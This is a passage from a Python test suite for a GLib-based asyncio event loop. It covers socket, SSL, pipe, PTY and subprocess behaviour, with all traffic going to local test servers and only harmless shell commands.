with test_utils.run_test_server(use_ssl=True) as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address,
ssl=test_utils.dummy_ssl_context())
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in type(tr).__name__.lower())
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = testsupport.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_create_server(self):
proto = None
def factory():
nonlocal proto
proto = MyProto()
return proto
f = self.loop.create_server(factory, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
test_utils.run_briefly(self.loop)
test_utils.run_until(self.loop, lambda: proto is not None, 10)
self.assertIsInstance(proto, MyProto)
#run_briefly() cannot guarantee that we run a single iteration (in the GLib loop)
# self.assertEqual('INITIAL', proto.state)
test_utils.run_briefly(self.loop)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0,
timeout=10)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
test_utils.run_briefly(self.loop) # windows iocp
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
f = self.loop.create_server(
factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = None
class ClientMyProto(MyProto):
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def factory():
nonlocal proto
proto = MyProto(loop=self.loop)
return proto
server, host, port = self._make_ssl_server(factory, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(ClientMyProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
test_utils.run_briefly(self.loop)
self.assertIsInstance(proto, MyProto)
test_utils.run_briefly(self.loop)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0,
timeout=10)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(HAS_SNI, 'No SNI support in ssl module')
def test_create_server_ssl_verify_failed(self):
proto = None
def factory():
nonlocal proto
proto = MyProto(loop=self.loop)
return proto
server, host, port = self._make_ssl_server(factory, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with self.assertRaisesRegex(ssl.SSLError,
'certificate verify failed '):
self.loop.run_until_complete(f_c)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(HAS_SNI, 'No SNI support in ssl module')
def test_create_server_ssl_match_failed(self):
proto = None
def factory():
nonlocal proto
proto = MyProto(loop=self.loop)
return proto
server, host, port = self._make_ssl_server(factory, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(HAS_SNI, 'No SNI support in ssl module')
def test_create_server_ssl_verified(self):
proto = None
def factory():
nonlocal proto
proto = MyProto(loop=self.loop)
return proto
server, host, port = self._make_ssl_server(factory, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(testsupport.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = testsupport.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertEqual('INITIALIZED', client.state)
transport.sendto(b'xxx')
for _ in range(1000):
if server.nbytes:
break
test_utils.run_briefly(self.loop)
self.assertEqual(3, server.nbytes)
for _ in range(1000):
if client.nbytes:
break
test_utils.run_briefly(self.loop)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = None
def factory():
nonlocal proto
proto = MyReadPipeProto(loop=self.loop)
return proto
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(factory, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_briefly(self.loop)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_briefly(self.loop)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@testsupport.requires_mac_ver(10, 6)
def test_read_pty_output(self):
proto = None
def factory():
nonlocal proto
proto = MyReadPipeProto(loop=self.loop)
return proto
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(factory,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
proto = None
transport = None
def factory():
nonlocal proto
proto = MyWritePipeProto(loop=self.loop)
return proto
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
@asyncio.coroutine
def connect():
nonlocal transport
t, p = yield from self.loop.connect_write_pipe(factory, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport = t
self.loop.run_until_complete(connect())
transport.write(b'1')
test_utils.run_briefly(self.loop)
data = os.read(rpipe, 1024)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_briefly(self.loop)
data = os.read(rpipe, 1024)
self.assertEqual(b'2345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
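# When the peer (read) side of the socketpair is closed, the write-pipe
# protocol must be disconnected and end up in the CLOSED state.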
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
proto = None
transport = None
def factory():
nonlocal proto
proto = MyWritePipeProto(loop=self.loop)
return proto
rsock, wsock = test_utils.socketpair()
pipeobj = io.open(wsock.detach(), 'wb', 1024)
@asyncio.coroutine
def connect():
nonlocal transport
t, p = yield from self.loop.connect_write_pipe(factory,
pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport = t
self.loop.run_until_complete(connect())
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
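# Same flow as test_write_pipe, but writing to the slave side of a PTY and
# reading the bytes back from the master fd.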
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@testsupport.requires_mac_ver(10, 6)
def test_write_pty(self):
proto = None
transport = None
def factory():
nonlocal proto
proto = MyWritePipeProto(loop=self.loop)
return proto
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
@asyncio.coroutine
def connect():
nonlocal transport
t, p = yield from self.loop.connect_write_pipe(factory,
slave_write_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport = t
self.loop.run_until_complete(connect())
transport.write(b'1')
test_utils.run_briefly(self.loop)
data = os.read(master, 1024)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_briefly(self.loop)
data = os.read(master, 1024)
self.assertEqual(b'2345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
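# Cancelling a pending sock_recv() future must wake the loop promptly: the
# whole run_forever() round trip has to finish in under 0.1 s.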
def test_prompt_cancellation(self):
r, w = test_utils.socketpair()
r.setblocking(False)
f = self.loop.sock_recv(r, 1)
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
@asyncio.coroutine
def main():
try:
self.loop.call_soon(f.cancel)
yield from f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
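# Sleeps of 10 ms and 0.1 ms should need only a handful of _run_once()
# iterations; a much larger count would indicate timeouts being rounded down
# towards zero (busy looping).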
# NOTE: unittest.skip() expects a reason string; on the Python versions this
# code targets, a bare @unittest.skip silently replaces the test body instead
# of reporting the test as skipped.
@unittest.skip("timeout rounding check disabled")
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
@asyncio.coroutine
def wait():
loop = self.loop
yield from asyncio.sleep(1e-2, loop=loop)
yield from asyncio.sleep(1e-4, loop=loop)
self.loop.run_until_complete(wait())
# The ideal number of calls is 6, but on some platforms the selector
# may sleep a little bit less than the timeout, depending on the
# resolution of the clock used by the kernel. Tolerate 2 useless calls
# on these platforms.
self.assertLessEqual(self.loop._run_once_counter, 8,
{'time_info': time.get_clock_info('time'),
'monotonic_info': time.get_clock_info('monotonic'),
'selector': self.loop._selector.__class__.__name__})
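# Tests for subprocess_exec()/subprocess_shell(), driving the small echo*.py
# helper scripts that live next to this test file.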
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def check_subp_closed(self, proto):
self.check_killed(proto.returncode)
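# Basic round trip: bytes written to the child's stdin come back on its
# stdout (echo.py) before the transport is closed.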
def test_subprocess_exec(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_subp_closed(proto)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
try:
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
finally:
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_subp_closed(proto)
def test_subprocess_shell(self):
proto = None
transp = None
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
proto = transp = None
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
proto = None
transp = None
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
def test_subprocess_stderr(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
proto = None
transp = None
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
@asyncio.coroutine
def connect():
nonlocal proto, transp
transp, proto = yield from self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_subp_closed(proto)
def test_subprocess_wait_no_same_group(self):
proto = None
transp = None
@asyncio.coroutine
def connect():
nonlocal proto, transp
# start the new process in a new session
transp, proto = yield from self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(connect())
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
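# Concrete test classes: Select/Proactor loops on Windows, the GLib (and
# optional Gtk) loops elsewhere; the stock selector-based loops below are
# left commented out.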
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, unittest.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
unittest.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with SSL")
def test_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with SSL")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with SSL")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with SSL")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = gpotato.GLibChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
# if hasattr(selectors, 'KqueueSelector'):
# class KqueueEventLoopTests(UnixEventLoopTestsMixin,
# SubprocessTestsMixin,
# unittest.TestCase):
#
# def create_event_loop(self):
# return unix_events.SelectorEventLoop(selectors.KqueueSelector())
#
# if hasattr(selectors, 'EpollSelector'):
# class EPollEventLoopTests(UnixEventLoopTestsMixin,
# SubprocessTestsMixin,
# unittest.TestCase):
#
# def create_event_loop(self):
# return unix_events.SelectorEventLoop(selectors.EpollSelector())
#
# if hasattr(selectors, 'PollSelector'):
# class PollEventLoopTests(UnixEventLoopTestsMixin,
# SubprocessTestsMixin,
# unittest.TestCase):
#
# def create_event_loop(self):
# return unix_events.SelectorEventLoop(selectors.PollSelector())
#
# # Should always exist.
# class SelectEventLoopTests(UnixEventLoopTestsMixin,
# SubprocessTestsMixin,
# unittest.TestCase):
#
# def create_event_loop(self):
# return unix_events.SelectorEventLoop(selectors.SelectSelector())
gpotato.BaseGLibEventLoop.init_class()
GObject.threads_init()
class GLibEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
unittest.TestCase):
def create_event_loop(self):
return gpotato.GLibEventLoop(GLib.main_context_default())
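# A minimal usage sketch for the loop under test (illustration only, not part
# of the suite; assumes gpotato and GLib are importable as above):
#
# loop = gpotato.GLibEventLoop(GLib.main_context_default())
# asyncio.set_event_loop(loop)
# loop.run_until_complete(asyncio.sleep(0, loop=loop))
# loop.close()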
if gpotato.Gtk:
